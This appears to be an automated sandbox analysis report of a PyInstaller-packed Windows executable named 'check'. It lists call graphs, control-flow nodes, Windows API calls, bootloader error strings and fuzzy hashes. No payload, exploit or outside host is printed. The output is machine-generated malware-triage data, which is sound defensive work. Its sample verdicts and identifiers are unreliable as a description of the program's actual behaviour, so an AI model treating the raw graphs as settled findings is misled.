12450->12451 12452 7ff712505478 _fread_nolock LeaveCriticalSection 12451->12452 12452->12448 12455 7ff7124f41a1 12454->12455 12456 7ff7124f44e0 2 API calls 12455->12456 12457 7ff7124f41db 12456->12457 12458 7ff7124f44e0 2 API calls 12457->12458 12459 7ff7124f41eb 12458->12459 12460 7ff7124f4267 12459->12460 12462 7ff7124f429c 12459->12462 12468 7ff7124f7cf0 12460->12468 12463 7ff7124f1950 42 API calls 12462->12463 12464 7ff7124f4277 12462->12464 12463->12464 12464->12332 12466 7ff7124f1c80 2 API calls 12465->12466 12467 7ff7124f4474 12466->12467 12467->12332 12469 7ff7124f7d05 12468->12469 12470 7ff7124f45c0 33 API calls 12469->12470 12471 7ff7124f7d2b 12470->12471 12472 7ff7124f45c0 33 API calls 12471->12472 12475 7ff7124f7d52 12471->12475 12473 7ff7124f7d42 12472->12473 12474 7ff7124f7d4d 12473->12474 12484 7ff7124f7d5c 12473->12484 12476 7ff71250004c 9 API calls 12474->12476 12475->12464 12476->12475 12477 7ff7124f7dbf 12478 7ff71250004c 9 API calls 12477->12478 12479 7ff7124f7de7 12478->12479 12481 7ff71250004c 9 API calls 12479->12481 12480 7ff71250039c _fread_nolock 23 API calls 12480->12484 12481->12475 12482 7ff7124f7dc1 12482->12477 12485 7ff712507318 12482->12485 12484->12477 12484->12480 12484->12482 12486 7ff712507320 12485->12486 12487 7ff71250735d 12486->12487 12488 7ff71250733c 12486->12488 12502 7ff71250546c EnterCriticalSection 12487->12502 12490 7ff712507341 _invalid_parameter_noinfo 12488->12490 12492 7ff71250734d 12490->12492 12492->12477 12504 7ff71250a49a 12503->12504 12505 7ff71250a485 12503->12505 12504->12341 12506 7ff71250a48a _invalid_parameter_noinfo 12505->12506 12506->12504 12512 7ff71250b150 GetLastError 12507->12512 12513 7ff71250b191 FlsSetValue 12512->12513 12514 7ff71250b174 FlsGetValue 12512->12514 12516 7ff71250b181 12513->12516 12517 7ff71250b1a3 12513->12517 12515 7ff71250b18b 12514->12515 12514->12516 12515->12513 12518 7ff71250b1fd SetLastError 12516->12518 12519 7ff71250eb98 _fread_nolock HeapAlloc 12517->12519 12520 7ff71250a3e1 12518->12520 12521 7ff71250b21d 12518->12521 12522 7ff71250b1b2 12519->12522 12532 7ff71250a504 12520->12532 12525 7ff71250a504 IsProcessorFeaturePresent 12521->12525 12523 7ff71250b1d0 FlsSetValue 12522->12523 12524 7ff71250b1c0 FlsSetValue 12522->12524 12527 7ff71250b1dc FlsSetValue 12523->12527 12528 7ff71250b1ee 12523->12528 12526 7ff71250b1c9 12524->12526 12529 7ff71250b222 12525->12529 12530 7ff71250a948 __free_lconv_mon 2 API calls 12526->12530 12527->12526 12531 7ff71250a948 __free_lconv_mon 2 API calls 12528->12531 12530->12516 12531->12518 12533 7ff71250a50d 12532->12533 12534 7ff71250a525 IsProcessorFeaturePresent 12533->12534 12535 7ff71250a534 12533->12535 12534->12535 12536 7ff712505628 12537 7ff71250565f 12536->12537 12541 7ff712505642 12536->12541 12538 7ff712505672 CreateFileW 12537->12538 12537->12541 12539 7ff7125056a6 12538->12539 12540 7ff7125056dc 12538->12540 12544 7ff7125056d1 CloseHandle 12539->12544 12545 7ff7125056bb CloseHandle 12539->12545 12548 7ff712505c04 12540->12548 12543 7ff71250564f _invalid_parameter_noinfo 12541->12543 12546 7ff7125056fd 12543->12546 12544->12546 12545->12546 12547 7ff7125056e1 12547->12546 12550 7ff712505c3a 12548->12550 12549 7ff712505cd2 12549->12547 12550->12549 12551 7ff712505cc4 GetDriveTypeW 12550->12551 12551->12549

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 00007FF7124F1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 0 7ff7124f1000-7ff7124f3806 call 7ff7124ffe18 call 7ff7124ffe20 call 7ff7124fc850 call 7ff7125053f0 call 7ff712505484 call 7ff7124f36b0 14 7ff7124f3814-7ff7124f3836 call 7ff7124f1950 0->14 15 7ff7124f3808-7ff7124f380f 0->15 20 7ff7124f391b-7ff7124f3931 call 7ff7124f45c0 14->20 21 7ff7124f383c-7ff7124f3856 call 7ff7124f1c80 14->21 17 7ff7124f3c97-7ff7124f3cb2 call 7ff7124fc550 15->17 28 7ff7124f3933-7ff7124f3960 call 7ff7124f7f90 20->28 29 7ff7124f396a-7ff7124f397f call 7ff7124f2710 20->29 25 7ff7124f385b-7ff7124f389b call 7ff7124f8830 21->25 34 7ff7124f38c1-7ff7124f38cc call 7ff712504f30 25->34 35 7ff7124f389d-7ff7124f38a3 25->35 41 7ff7124f3984-7ff7124f39a6 call 7ff7124f1c80 28->41 42 7ff7124f3962-7ff7124f3965 call 7ff71250004c 28->42 37 7ff7124f3c8f 29->37 49 7ff7124f38d2-7ff7124f38e1 call 7ff7124f8830 34->49 50 7ff7124f39fc-7ff7124f3a2a call 7ff7124f8940 call 7ff7124f89a0 * 3 34->50 38 7ff7124f38a5-7ff7124f38ad 35->38 39 7ff7124f38af-7ff7124f38bd call 7ff7124f89a0 35->39 37->17 38->39 39->34 53 7ff7124f39b0-7ff7124f39b9 41->53 42->29 57 7ff7124f39f4-7ff7124f39f7 call 7ff712504f30 49->57 58 7ff7124f38e7-7ff7124f38ed 49->58 76 7ff7124f3a2f-7ff7124f3a3e call 7ff7124f8830 50->76 53->53 56 7ff7124f39bb-7ff7124f39d8 call 7ff7124f1950 53->56 56->25 68 7ff7124f39de-7ff7124f39ef call 7ff7124f2710 56->68 57->50 61 7ff7124f38f0-7ff7124f38fc 58->61 65 7ff7124f3905-7ff7124f3908 61->65 66 7ff7124f38fe-7ff7124f3903 61->66 65->57 69 7ff7124f390e-7ff7124f3916 call 7ff712504f30 65->69 66->61 66->65 68->37 69->76 79 7ff7124f3b45-7ff7124f3b53 76->79 80 7ff7124f3a44-7ff7124f3a47 76->80 81 7ff7124f3b59-7ff7124f3b5d 79->81 82 7ff7124f3a67 79->82 80->79 83 7ff7124f3a4d-7ff7124f3a50 80->83 84 7ff7124f3a6b-7ff7124f3a90 call 7ff712504f30 81->84 82->84 85 7ff7124f3a56-7ff7124f3a5a 83->85 86 7ff7124f3b14-7ff7124f3b17 83->86 94 7ff7124f3a92-7ff7124f3aa6 call 7ff7124f8940 84->94 95 7ff7124f3aab-7ff7124f3ac0 84->95 85->86 88 7ff7124f3a60 85->88 89 7ff7124f3b2f-7ff7124f3b40 call 7ff7124f2710 86->89 90 7ff7124f3b19-7ff7124f3b1d 86->90 88->82 98 7ff7124f3c7f-7ff7124f3c87 89->98 90->89 91 7ff7124f3b1f-7ff7124f3b2a 90->91 91->84 94->95 99 7ff7124f3ac6-7ff7124f3aca 95->99 100 7ff7124f3be8-7ff7124f3bfa call 7ff7124f8830 95->100 98->37 102 7ff7124f3ad0-7ff7124f3ae8 call 7ff712505250 99->102 103 7ff7124f3bcd-7ff7124f3be2 call 7ff7124f1940 99->103 108 7ff7124f3c2e 100->108 109 7ff7124f3bfc-7ff7124f3c02 100->109 113 7ff7124f3b62-7ff7124f3b7a call 7ff712505250 102->113 114 7ff7124f3aea-7ff7124f3b02 call 7ff712505250 102->114 103->99 103->100 115 7ff7124f3c31-7ff7124f3c40 call 7ff712504f30 108->115 111 7ff7124f3c04-7ff7124f3c1c 109->111 112 7ff7124f3c1e-7ff7124f3c2c 109->112 111->115 112->115 122 7ff7124f3b7c-7ff7124f3b80 113->122 123 7ff7124f3b87-7ff7124f3b9f call 7ff712505250 113->123 114->103 124 7ff7124f3b08-7ff7124f3b0f 114->124 125 7ff7124f3c46-7ff7124f3c4a 115->125 126 7ff7124f3d41-7ff7124f3d63 call 7ff7124f44e0 115->126 122->123 139 7ff7124f3ba1-7ff7124f3ba5 123->139 140 7ff7124f3bac-7ff7124f3bc4 call 7ff712505250 123->140 124->103 127 7ff7124f3cd4-7ff7124f3ce6 call 7ff7124f8830 125->127 128 7ff7124f3c50-7ff7124f3c5f call 7ff7124f90e0 125->128 137 7ff7124f3d65-7ff7124f3d6f call 7ff7124f4630 126->137 138 7ff7124f3d71-7ff7124f3d82 call 7ff7124f1c80 126->138 143 7ff7124f3d35-7ff7124f3d3c 127->143 144 7ff7124f3ce8-7ff7124f3ceb 127->144 141 7ff7124f3cb3-7ff7124f3cbd call 7ff7124f8660 128->141 142 7ff7124f3c61 128->142 152 7ff7124f3d87-7ff7124f3d96 137->152 138->152 139->140 140->103 154 7ff7124f3bc6 140->154 164 7ff7124f3cbf-7ff7124f3cc6 141->164 165 7ff7124f3cc8-7ff7124f3ccf 141->165 149 7ff7124f3c68 call 7ff7124f2710 142->149 143->149 144->143 150 7ff7124f3ced-7ff7124f3d10 call 7ff7124f1c80 144->150 160 7ff7124f3c6d-7ff7124f3c77 149->160 166 7ff7124f3d12-7ff7124f3d26 call 7ff7124f2710 call 7ff712504f30 150->166 167 7ff7124f3d2b-7ff7124f3d33 call 7ff712504f30 150->167 157 7ff7124f3dc4-7ff7124f3dda call 7ff7124f9390 152->157 158 7ff7124f3d98-7ff7124f3d9f 152->158 154->103 170 7ff7124f3ddc 157->170 171 7ff7124f3de8-7ff7124f3e04 SetDllDirectoryW 157->171 158->157 162 7ff7124f3da1-7ff7124f3da5 158->162 160->98 162->157 168 7ff7124f3da7-7ff7124f3dbe SetDllDirectoryW LoadLibraryExW 162->168 164->149 165->152 166->160 167->152 168->157 170->171 174 7ff7124f3f01-7ff7124f3f08 171->174 175 7ff7124f3e0a-7ff7124f3e19 call 7ff7124f8830 171->175 180 7ff7124f3f0e-7ff7124f3f15 174->180 181 7ff7124f4008-7ff7124f4010 174->181 189 7ff7124f3e32-7ff7124f3e3c call 7ff712504f30 175->189 190 7ff7124f3e1b-7ff7124f3e21 175->190 180->181 186 7ff7124f3f1b-7ff7124f3f25 call 7ff7124f33c0 180->186 182 7ff7124f4035-7ff7124f4040 call 7ff7124f36a0 call 7ff7124f3360 181->182 183 7ff7124f4012-7ff7124f402f PostMessageW GetMessageW 181->183 200 7ff7124f4045-7ff7124f4067 call 7ff7124f3670 call 7ff7124f6fc0 call 7ff7124f6d70 182->200 183->182 186->160 196 7ff7124f3f2b-7ff7124f3f3f call 7ff7124f90c0 186->196 201 7ff7124f3ef2-7ff7124f3efc call 7ff7124f8940 189->201 202 7ff7124f3e42-7ff7124f3e48 189->202 193 7ff7124f3e23-7ff7124f3e2b 190->193 194 7ff7124f3e2d-7ff7124f3e2f 190->194 193->194 194->189 207 7ff7124f3f64-7ff7124f3fa7 call 7ff7124f8940 call 7ff7124f89e0 call 7ff7124f6fc0 call 7ff7124f6d70 call 7ff7124f88e0 196->207 208 7ff7124f3f41-7ff7124f3f5e PostMessageW GetMessageW 196->208 201->174 202->201 206 7ff7124f3e4e-7ff7124f3e54 202->206 210 7ff7124f3e56-7ff7124f3e58 206->210 211 7ff7124f3e5f-7ff7124f3e61 206->211 247 7ff7124f3ff5-7ff7124f4003 call 7ff7124f1900 207->247 248 7ff7124f3fa9-7ff7124f3fbf call 7ff7124f8ed0 call 7ff7124f88e0 207->248 208->207 212 7ff7124f3e67-7ff7124f3e83 call 7ff7124f6dc0 call 7ff7124f7340 210->212 215 7ff7124f3e5a 210->215 211->174 211->212 227 7ff7124f3e85-7ff7124f3e8c 212->227 228 7ff7124f3e8e-7ff7124f3e95 212->228 215->174 230 7ff7124f3edb-7ff7124f3ef0 call 7ff7124f2a50 call 7ff7124f6fc0 call 7ff7124f6d70 227->230 231 7ff7124f3eaf-7ff7124f3eb9 call 7ff7124f71b0 228->231 232 7ff7124f3e97-7ff7124f3ea4 call 7ff7124f6e00 228->232 230->174 245 7ff7124f3ec4-7ff7124f3ed2 call 7ff7124f74f0 231->245 246 7ff7124f3ebb-7ff7124f3ec2 231->246 232->231 244 7ff7124f3ea6-7ff7124f3ead 232->244 244->230 245->174 257 7ff7124f3ed4 245->257 246->230 247->160 248->247 261 7ff7124f3fc1-7ff7124f3fd6 248->261 257->230 262 7ff7124f3ff0 call 7ff7124f2a50 261->262 263 7ff7124f3fd8-7ff7124f3feb call 7ff7124f2710 call 7ff7124f1900 261->263 262->247 263->160
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                          • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                          • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                          • Opcode ID: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
                                                                                                                                                                                                                                          • Instruction ID: 13a1cf9cfc0490d70509ab780e1adc8d9ddc2affd3ac70d1af915af003fb0ca4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83326021B0CEC251FB15FB2994553B9AA91AF847A0FC44072DE5D432D6EFACE96CC321
                                                                                                                                                                                                                                          Function 00007FF712516964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 467 7ff712516964-7ff7125169d7 call 7ff712516698 470 7ff7125169d9-7ff7125169e2 call 7ff712504ee8 467->470 471 7ff7125169f1-7ff7125169fb call 7ff712508520 467->471 478 7ff7125169e5-7ff7125169ec call 7ff712504f08 470->478 476 7ff7125169fd-7ff712516a14 call 7ff712504ee8 call 7ff712504f08 471->476 477 7ff712516a16-7ff712516a7f CreateFileW 471->477 476->478 480 7ff712516afc-7ff712516b07 GetFileType 477->480 481 7ff712516a81-7ff712516a87 477->481 489 7ff712516d32-7ff712516d52 478->489 484 7ff712516b09-7ff712516b44 GetLastError call 7ff712504e7c CloseHandle 480->484 485 7ff712516b5a-7ff712516b61 480->485 487 7ff712516ac9-7ff712516af7 GetLastError call 7ff712504e7c 481->487 488 7ff712516a89-7ff712516a8d 481->488 484->478 501 7ff712516b4a-7ff712516b55 call 7ff712504f08 484->501 492 7ff712516b69-7ff712516b6c 485->492 493 7ff712516b63-7ff712516b67 485->493 487->478 488->487 494 7ff712516a8f-7ff712516ac7 CreateFileW 488->494 498 7ff712516b72-7ff712516bc7 call 7ff712508438 492->498 499 7ff712516b6e 492->499 493->498 494->480 494->487 506 7ff712516bc9-7ff712516bd5 call 7ff7125168a0 498->506 507 7ff712516be6-7ff712516c17 call 7ff712516418 498->507 499->498 501->478 506->507 512 7ff712516bd7 506->512 513 7ff712516c19-7ff712516c1b 507->513 514 7ff712516c1d-7ff712516c5f 507->514 515 7ff712516bd9-7ff712516be1 call 7ff71250aac0 512->515 513->515 516 7ff712516c81-7ff712516c8c 514->516 517 7ff712516c61-7ff712516c65 514->517 515->489 520 7ff712516d30 516->520 521 7ff712516c92-7ff712516c96 516->521 517->516 519 7ff712516c67-7ff712516c7c 517->519 519->516 520->489 521->520 523 7ff712516c9c-7ff712516ce1 CloseHandle CreateFileW 521->523 524 7ff712516ce3-7ff712516d11 GetLastError call 7ff712504e7c call 7ff712508660 523->524 525 7ff712516d16-7ff712516d2b 523->525 524->525 525->520
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                                                                                          • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                          • Instruction ID: 9d793bcebb9820c0151182275b16c511ee14b60cf496184f33455bab8c33df73
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1C1F036B28E428AEB10EFA5C4806AC7761FB49BA8F814275DE1E573D4DF78D059C320
                                                                                                                                                                                                                                          Function 00007FF7124F9280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                                                          • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                          • Instruction ID: f102be3be1262ad0f5a563cf48079da30169def0fb55f0480335955de7b6ac2e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70F0AF36A18A4286F7A0AF64B4C8766B390AB84338F850635DE6D06AD4DFBCD45DCA04
                                                                                                                                                                                                                                          Function 00007FF7124F1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 269 7ff7124f1950-7ff7124f198b call 7ff7124f45c0 272 7ff7124f1991-7ff7124f19d1 call 7ff7124f7f90 269->272 273 7ff7124f1c4e-7ff7124f1c72 call 7ff7124fc550 269->273 278 7ff7124f1c3b-7ff7124f1c3e call 7ff71250004c 272->278 279 7ff7124f19d7-7ff7124f19e7 call 7ff7125006d4 272->279 283 7ff7124f1c43-7ff7124f1c4b 278->283 284 7ff7124f19e9-7ff7124f1a03 call 7ff712504f08 call 7ff7124f2910 279->284 285 7ff7124f1a08-7ff7124f1a24 call 7ff71250039c 279->285 283->273 284->278 291 7ff7124f1a45-7ff7124f1a5a call 7ff712504f28 285->291 292 7ff7124f1a26-7ff7124f1a40 call 7ff712504f08 call 7ff7124f2910 285->292 299 7ff7124f1a7b-7ff7124f1afc call 7ff7124f1c80 * 2 call 7ff7125006d4 291->299 300 7ff7124f1a5c-7ff7124f1a76 call 7ff712504f08 call 7ff7124f2910 291->300 292->278 311 7ff7124f1b01-7ff7124f1b14 call 7ff712504f44 299->311 300->278 314 7ff7124f1b35-7ff7124f1b4e call 7ff71250039c 311->314 315 7ff7124f1b16-7ff7124f1b30 call 7ff712504f08 call 7ff7124f2910 311->315 320 7ff7124f1b6f-7ff7124f1b8b call 7ff712500110 314->320 321 7ff7124f1b50-7ff7124f1b6a call 7ff712504f08 call 7ff7124f2910 314->321 315->278 329 7ff7124f1b8d-7ff7124f1b99 call 7ff7124f2710 320->329 330 7ff7124f1b9e-7ff7124f1bac 320->330 321->278 329->278 330->278 331 7ff7124f1bb2-7ff7124f1bb9 330->331 334 7ff7124f1bc1-7ff7124f1bc7 331->334 336 7ff7124f1be0-7ff7124f1bef 334->336 337 7ff7124f1bc9-7ff7124f1bd6 334->337 336->336 338 7ff7124f1bf1-7ff7124f1bfa 336->338 337->338 339 7ff7124f1c0f 338->339 340 7ff7124f1bfc-7ff7124f1bff 338->340 342 7ff7124f1c11-7ff7124f1c24 339->342 340->339 341 7ff7124f1c01-7ff7124f1c04 340->341 341->339 343 7ff7124f1c06-7ff7124f1c09 341->343 344 7ff7124f1c26 342->344 345 7ff7124f1c2d-7ff7124f1c39 342->345 343->339 346 7ff7124f1c0b-7ff7124f1c0d 343->346 344->345 345->278 345->334 346->342
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F7F90: _fread_nolock.LIBCMT ref: 00007FF7124F803A
                                                                                                                                                                                                                                          • _fread_nolock.LIBCMT ref: 00007FF7124F1A1B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7124F1B6A), ref: 00007FF7124F295E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                          • Opcode ID: b426b7569fd43417053a9482fb0298cff99dadbc456d732c1d031cb9eee9613e
                                                                                                                                                                                                                                          • Instruction ID: d27cb7974da7f77c1c872de6d11cb7419305b0380561055176f6cf65dfd59ab2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b426b7569fd43417053a9482fb0298cff99dadbc456d732c1d031cb9eee9613e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15817371A0CE8686EB20FF18D4806B9A391EF857A4F844431DD8D47785EEBCE959C760
                                                                                                                                                                                                                                          Function 00007FF7124F1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                          • Opcode ID: 72f99dadd0a2177c1d42b060d7648ca84eb7dddf70f4030becfdb2944091b5e7
                                                                                                                                                                                                                                          • Instruction ID: 12498d1b4611b6e0778587e2eb5e10dd099d62bb3fdbc7242728264058f333fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72f99dadd0a2177c1d42b060d7648ca84eb7dddf70f4030becfdb2944091b5e7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF415121B08E4296EB10FF2598405B9E390EF857A4FC44532ED4D17B95EEBCE91AC724
                                                                                                                                                                                                                                          Function 00007FF7124F1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
